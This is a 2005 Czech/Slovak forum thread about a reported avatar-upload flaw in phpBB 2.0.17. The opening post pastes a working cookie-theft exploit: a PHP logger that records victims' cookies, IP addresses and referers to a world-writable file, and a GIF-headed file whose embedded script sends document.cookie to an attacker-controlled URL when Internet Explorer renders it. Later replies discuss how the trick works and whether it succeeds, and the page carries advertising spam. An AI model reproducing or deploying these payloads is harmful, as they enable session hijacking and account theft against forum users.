| Zobrazit předchozí téma :: Zobrazit následující téma |
| Autor |
Zpráva |
Catlover
Profesionál
Založen: 25.4.2005
Příspěvky: 506
Bydliště: United States of Slovakia
|
 Zaslal: 26 říjen 2005 17:51 Předmět: phpBB 2.0.17 v ohrozeni aneb. ako na phpBB 2.0.17... |
 |
|
| kód: | suBzero@kisobox.com http://Kisobox.com
Affected <= phpbb 2.0.17 && IE 6
//cut start
//cookies.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt'); // chmod 777 and same directory
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>
//cut end
//rename it to cookies.php and create one new file log.txt chmod it to 777
// Gif upload (avatar),affected IE user
// exploit below
<GIF89aŸ�8�÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>
//rename to .gif extensio |
je to mozne??? ja som to skusal a nic... maybe som to zle robil... len ma zaujima, ci mam zakazt upload avatarov alebo nie...
_________________
 |
|
| Návrat nahoru |
|
 |
hojko
Profesionál
Založen: 25.2.2005
Příspěvky: 671
Bydliště: New Zeland
|
| Zaslal: 26 říjen 2005 18:08 Předmět: |
|
|
Toto je co akoze???: <GIF89aŸ�8�÷™fÿ™™>
_________________
www.hojko.com |
|
| Návrat nahoru |
|
|
drake127
Profesionál
Založen: 30.5.2005
Příspěvky: 500
Bydliště: Jihlava, Czech Republic
|
| Zaslal: 26 říjen 2005 18:15 Předmět: |
|
|
| hojko napsal: | | Toto je co akoze???: <GIF89aŸ�8�÷™fÿ™™> |
Tipuju, že se to nahraje jako avatar, projde to přes testování na obrázek a IE to interpretuje jako html, které vykoná.
_________________
Žralok, který štěká, nekouše. |
|
| Návrat nahoru |
|
|
PvvS
Profesionál
Založen: 7.3.2003
Příspěvky: 1633
|
| Zaslal: 26 říjen 2005 18:27 Předmět: Re: phpBB 2.0.17 v ohrozeni aneb. ako na phpBB 2.0.17... |
|
|
hmm nefunguje
_________________
Pryc s warezem a warezakama |
|
| Návrat nahoru |
|
|
Webhosting C4 - 2 GB, PHP, MySQL, administrační systém, 1.200 Kč na rok s doménou v ceně.
Bezproblémová instalace phpBB, Joomla, Drupal. Návody pro C4 - užitečné rady pro zákazníky.
Kvalitní notebooky,
spolehlivé dřevostavby,
útulné domy,
výhodné
sázkové kanceláře
Apartment in Prague - accommodation in Prag,
prague
apartments, kvalitní plastová okna, levné ubytování
|
|
JanoF
Profesionál
Založen: 13.5.2005
Příspěvky: 1141
Bydliště: Bratislava
|
|
| Návrat nahoru |
|
|
mm-marek
Profesionál
Založen: 1.4.2005
Příspěvky: 341
Bydliště: localhost
|
| Zaslal: 26 říjen 2005 18:37 Předmět: Re: phpBB 2.0.17 v ohrozeni aneb. ako na phpBB 2.0.17... |
|
|
někde jsem něco takového slyšel, pak se na různých forech zakazovalo přidávání podpisů. že tam byl obrázek s kódem. Jak to dopadlo nevím. Proč nejsou podpisy zde?
_________________
bikenews.cz |
|
| Návrat nahoru |
|
|
JanoF
Profesionál
Založen: 13.5.2005
Příspěvky: 1141
Bydliště: Bratislava
|
|
| Návrat nahoru |
|
|
mm-marek
Profesionál
Založen: 1.4.2005
Příspěvky: 341
Bydliště: localhost
|
|
| Návrat nahoru |
|
|
Catlover
Profesionál
Založen: 25.4.2005
Příspěvky: 506
Bydliště: United States of Slovakia
|
| Zaslal: 26 říjen 2005 19:10 Předmět: |
|
|
a este sa v tom vyskytuje taky problemos, ze ked chcem ten dany .gif nahrat napr. ako avatar, napise, ze je to velmi velke (rozmerovo).
raz mi to ale do toho log.txt napisalo . (bodku) 
_________________
|
|
| Návrat nahoru |
|
|
JanoF
Profesionál
Založen: 13.5.2005
Příspěvky: 1141
Bydliště: Bratislava
|
|
| Návrat nahoru |
|
|
|
|
|
